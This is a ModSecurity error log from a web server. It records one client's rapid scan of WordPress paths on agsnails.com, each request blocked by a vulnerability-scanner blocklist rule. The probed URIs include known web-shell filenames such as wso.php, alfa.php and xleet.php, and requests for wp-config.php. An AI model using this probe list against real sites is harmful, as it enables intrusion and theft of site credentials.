[Tue May 26 13:12:54.115912 2026] [security2:error] [pid 496740:tid 496934] [client 108.136.131.13:59659] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-activate.php"] [unique_id "ahVO_uvOeft4ltnLrH4_wwAAAEA"]
[Tue May 26 13:12:54.543050 2026] [security2:error] [pid 496740:tid 496991] [client 108.136.131.13:61291] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/dropdown.php"] [unique_id "ahVO_uvOeft4ltnLrH4_0gAAAHk"]
[Tue May 26 13:12:54.544360 2026] [security2:error] [pid 496740:tid 496969] [client 108.136.131.13:61281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/alfa.php"] [unique_id "ahVO_uvOeft4ltnLrH4_0wAAAGM"]
[Tue May 26 13:12:54.545053 2026] [security2:error] [pid 496740:tid 496941] [client 108.136.131.13:61282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/css/colors/xmrlpc.php"] [unique_id "ahVO_uvOeft4ltnLrH4_1AAAAEc"]
[Tue May 26 13:12:54.553046 2026] [security2:error] [pid 496740:tid 496884] [client 108.136.131.13:61278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/about.php"] [unique_id "ahVO_uvOeft4ltnLrH4_1QAAAA4"]
[Tue May 26 13:12:54.565346 2026] [security2:error] [pid 496740:tid 496878] [client 108.136.131.13:61280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/admin.php"] [unique_id "ahVO_uvOeft4ltnLrH4_1gAAAAg"]
[Tue May 26 13:12:54.993776 2026] [security2:error] [pid 496740:tid 496917] [client 108.136.131.13:61805] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/images/about.php"] [unique_id "ahVO_uvOeft4ltnLrH4_5AAAAC8"]
[Tue May 26 13:12:54.993897 2026] [security2:error] [pid 496740:tid 496950] [client 108.136.131.13:61808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/includes/atomlib.php"] [unique_id "ahVO_uvOeft4ltnLrH4_5QAAAFA"]
[Tue May 26 13:12:54.995847 2026] [security2:error] [pid 496740:tid 496908] [client 108.136.131.13:61800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/fw.php"] [unique_id "ahVO_uvOeft4ltnLrH4_5gAAACY"]
[Tue May 26 13:12:54.996574 2026] [security2:error] [pid 496740:tid 496919] [client 108.136.131.13:61812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/index.php"] [unique_id "ahVO_uvOeft4ltnLrH4_5wAAADE"]
[Tue May 26 13:12:55.006063 2026] [security2:error] [pid 496740:tid 496895] [client 108.136.131.13:61811] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/includes/index.php"] [unique_id "ahVO_-vOeft4ltnLrH4_6AAAABk"]
[Tue May 26 13:12:55.437059 2026] [security2:error] [pid 496740:tid 496926] [client 108.136.131.13:62352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/radio.php"] [unique_id "ahVO_-vOeft4ltnLrH5ABAAAADg"]
[Tue May 26 13:12:55.440383 2026] [security2:error] [pid 496740:tid 496906] [client 108.136.131.13:62333] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/inputs.php"] [unique_id "ahVO_-vOeft4ltnLrH5ABQAAACQ"]
[Tue May 26 13:12:55.440703 2026] [security2:error] [pid 496740:tid 496952] [client 108.136.131.13:62347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/plugins.php"] [unique_id "ahVO_-vOeft4ltnLrH5ABgAAAFI"]
[Tue May 26 13:12:55.442208 2026] [security2:error] [pid 496740:tid 496913] [client 108.136.131.13:62336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/install.php"] [unique_id "ahVO_-vOeft4ltnLrH5ABwAAACs"]
[Tue May 26 13:12:55.452296 2026] [security2:error] [pid 496740:tid 496888] [client 108.136.131.13:62338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/maint/index.php"] [unique_id "ahVO_-vOeft4ltnLrH5ACAAAABI"]
[Tue May 26 13:12:55.619587 2026] [security2:error] [pid 496740:tid 496921] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO_-vOeft4ltnLrH4_-AAAADM"]
[Tue May 26 13:12:55.870861 2026] [security2:error] [pid 496740:tid 496963] [client 108.136.131.13:62463] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/upload.php"] [unique_id "ahVO_-vOeft4ltnLrH5AHAAAAF0"]
[Tue May 26 13:12:55.870951 2026] [security2:error] [pid 496740:tid 496992] [client 108.136.131.13:62465] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/wp-login.php"] [unique_id "ahVO_-vOeft4ltnLrH5AGwAAAHo"]
[Tue May 26 13:12:55.873204 2026] [security2:error] [pid 496740:tid 496935] [client 108.136.131.13:62464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/user/index.php"] [unique_id "ahVO_-vOeft4ltnLrH5AHQAAAEE"]
[Tue May 26 13:12:55.874164 2026] [security2:error] [pid 496740:tid 496987] [client 108.136.131.13:62457] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/themes.php"] [unique_id "ahVO_-vOeft4ltnLrH5AHgAAAHU"]
[Tue May 26 13:12:55.890508 2026] [security2:error] [pid 496740:tid 496876] [client 108.136.131.13:62466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/wso.php"] [unique_id "ahVO_-vOeft4ltnLrH5AHwAAAAY"]
[Tue May 26 13:12:56.314603 2026] [security2:error] [pid 496740:tid 496990] [client 108.136.131.13:62705] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-config-sample.php"] [unique_id "ahVPAOvOeft4ltnLrH5AMAAAAHg"]
[Tue May 26 13:12:56.315888 2026] [security2:error] [pid 496740:tid 496979] [client 108.136.131.13:62706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-config.php"] [unique_id "ahVPAOvOeft4ltnLrH5AMQAAAG0"]
[Tue May 26 13:12:56.317556 2026] [security2:error] [pid 496740:tid 496881] [client 108.136.131.13:62695] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-blog-header.php"] [unique_id "ahVPAOvOeft4ltnLrH5AMgAAAAs"]
[Tue May 26 13:12:56.332413 2026] [security2:error] [pid 496740:tid 496893] [client 108.136.131.13:62701] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-conctent.php"] [unique_id "ahVPAOvOeft4ltnLrH5AMwAAABc"]
[Tue May 26 13:12:56.344556 2026] [security2:error] [pid 496740:tid 496898] [client 108.136.131.13:62693] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-atom.php"] [unique_id "ahVPAOvOeft4ltnLrH5ANAAAABw"]
[Tue May 26 13:12:56.765726 2026] [security2:error] [pid 496740:tid 496872] [client 108.136.131.13:62844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-conflg.php"] [unique_id "ahVPAOvOeft4ltnLrH5ASQAAAAI"]
[Tue May 26 13:12:56.769508 2026] [security2:error] [pid 496740:tid 496928] [client 108.136.131.13:62865] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/admin.php"] [unique_id "ahVPAOvOeft4ltnLrH5ASgAAADo"]
[Tue May 26 13:12:56.770793 2026] [security2:error] [pid 496740:tid 496912] [client 108.136.131.13:62866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/flame.php"] [unique_id "ahVPAOvOeft4ltnLrH5ATAAAACo"]
[Tue May 26 13:12:56.770937 2026] [security2:error] [pid 496740:tid 496973] [client 108.136.131.13:62845] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content.php"] [unique_id "ahVPAOvOeft4ltnLrH5ATQAAAGc"]
[Tue May 26 13:12:56.775312 2026] [security2:error] [pid 496740:tid 496887] [client 108.136.131.13:62847] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/about.php"] [unique_id "ahVPAOvOeft4ltnLrH5ATgAAABE"]
[Tue May 26 13:12:57.195325 2026] [security2:error] [pid 496740:tid 496975] [client 108.136.131.13:63123] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/inputs.php"] [unique_id "ahVPAevOeft4ltnLrH5AXgAAAGk"]
[Tue May 26 13:12:57.199057 2026] [security2:error] [pid 496740:tid 496955] [client 108.136.131.13:63113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/function.php"] [unique_id "ahVPAevOeft4ltnLrH5AXwAAAFU"]
[Tue May 26 13:12:57.205918 2026] [security2:error] [pid 496740:tid 496930] [client 108.136.131.13:63115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/fw.php"] [unique_id "ahVPAevOeft4ltnLrH5AYAAAADw"]
[Tue May 26 13:12:57.206750 2026] [security2:error] [pid 496740:tid 496903] [client 108.136.131.13:63124] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/languages/about.php"] [unique_id "ahVPAevOeft4ltnLrH5AYQAAACE"]
[Tue May 26 13:12:57.207510 2026] [security2:error] [pid 496740:tid 496933] [client 108.136.131.13:63117] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/index.php"] [unique_id "ahVPAevOeft4ltnLrH5AYgAAAD8"]
[Tue May 26 13:12:57.633573 2026] [security2:error] [pid 496740:tid 496951] [client 108.136.131.13:63216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/plugins/inputs.php"] [unique_id "ahVPAevOeft4ltnLrH5AewAAAFE"]
[Tue May 26 13:12:57.634312 2026] [security2:error] [pid 496740:tid 496902] [client 108.136.131.13:63219] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/themes/about.php"] [unique_id "ahVPAevOeft4ltnLrH5AfQAAACA"]
[Tue May 26 13:12:57.635937 2026] [security2:error] [pid 496740:tid 496927] [client 108.136.131.13:63220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/themes/alera/alpha.php"] [unique_id "ahVPAevOeft4ltnLrH5AfgAAADk"]
[Tue May 26 13:12:57.636546 2026] [security2:error] [pid 496740:tid 496984] [client 108.136.131.13:63195] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahVPAevOeft4ltnLrH5AfwAAAHI"]
[Tue May 26 13:12:57.650684 2026] [security2:error] [pid 496740:tid 496894] [client 108.136.131.13:63218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/radio.php"] [unique_id "ahVPAevOeft4ltnLrH5AgAAAABg"]
[Tue May 26 13:12:57.791513 2026] [security2:error] [pid 496740:tid 496960] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPAevOeft4ltnLrH5AagAAAFo"]
[Tue May 26 13:12:58.072845 2026] [security2:error] [pid 496740:tid 496978] [client 108.136.131.13:63452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/uploads/about.php"] [unique_id "ahVPAuvOeft4ltnLrH5AlgAAAGw"]
[Tue May 26 13:12:58.075898 2026] [security2:error] [pid 496740:tid 496959] [client 108.136.131.13:63453] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/uploads/inputs.php"] [unique_id "ahVPAuvOeft4ltnLrH5AlwAAAFk"]
[Tue May 26 13:12:58.077042 2026] [security2:error] [pid 496740:tid 496911] [client 108.136.131.13:63455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/themes/index.php"] [unique_id "ahVPAuvOeft4ltnLrH5AmAAAACk"]
[Tue May 26 13:12:58.081802 2026] [security2:error] [pid 496740:tid 496882] [client 108.136.131.13:63451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/themes/inputs.php"] [unique_id "ahVPAuvOeft4ltnLrH5AmQAAAAw"]
[Tue May 26 13:12:58.107563 2026] [security2:error] [pid 496740:tid 496992] [client 108.136.131.13:63454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/wso.php"] [unique_id "ahVPAuvOeft4ltnLrH5AmwAAAHo"]
[Tue May 26 13:12:58.531593 2026] [security2:error] [pid 496740:tid 496908] [client 108.136.131.13:64049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-defaul.php"] [unique_id "ahVPAuvOeft4ltnLrH5ArgAAACY"]
[Tue May 26 13:12:58.531874 2026] [security2:error] [pid 496740:tid 496977] [client 108.136.131.13:64054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-files.php"] [unique_id "ahVPAuvOeft4ltnLrH5ArwAAAGs"]
[Tue May 26 13:12:58.537877 2026] [security2:error] [pid 496740:tid 496948] [client 108.136.131.13:64048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-cron.php"] [unique_id "ahVPAuvOeft4ltnLrH5AsQAAAE4"]
[Tue May 26 13:12:58.539279 2026] [security2:error] [pid 496740:tid 496926] [client 108.136.131.13:64056] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/xleet.php"] [unique_id "ahVPAuvOeft4ltnLrH5AsgAAADg"]
[Tue May 26 13:12:58.544782 2026] [security2:error] [pid 496740:tid 496937] [client 108.136.131.13:64055] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes.php"] [unique_id "ahVPAuvOeft4ltnLrH5AtAAAAEM"]
[Tue May 26 13:12:58.970992 2026] [security2:error] [pid 496740:tid 496954] [client 108.136.131.13:64480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/assets/index.php"] [unique_id "ahVPAuvOeft4ltnLrH5AwwAAAFQ"]
[Tue May 26 13:12:58.979667 2026] [security2:error] [pid 496740:tid 496884] [client 108.136.131.13:64484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/content.php"] [unique_id "ahVPAuvOeft4ltnLrH5AxQAAAA4"]
[Tue May 26 13:12:58.980720 2026] [security2:error] [pid 496740:tid 496978] [client 108.136.131.13:64481] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/assets/wp-login.php"] [unique_id "ahVPAuvOeft4ltnLrH5AxwAAAGw"]
[Tue May 26 13:12:58.984562 2026] [security2:error] [pid 496740:tid 496952] [client 108.136.131.13:64482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/autoload_classmap.php"] [unique_id "ahVPAuvOeft4ltnLrH5AyQAAAFI"]
[Tue May 26 13:13:00.849522 2026] [security2:error] [pid 496740:tid 496974] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPBOvOeft4ltnLrH5BBAAAAGg"]
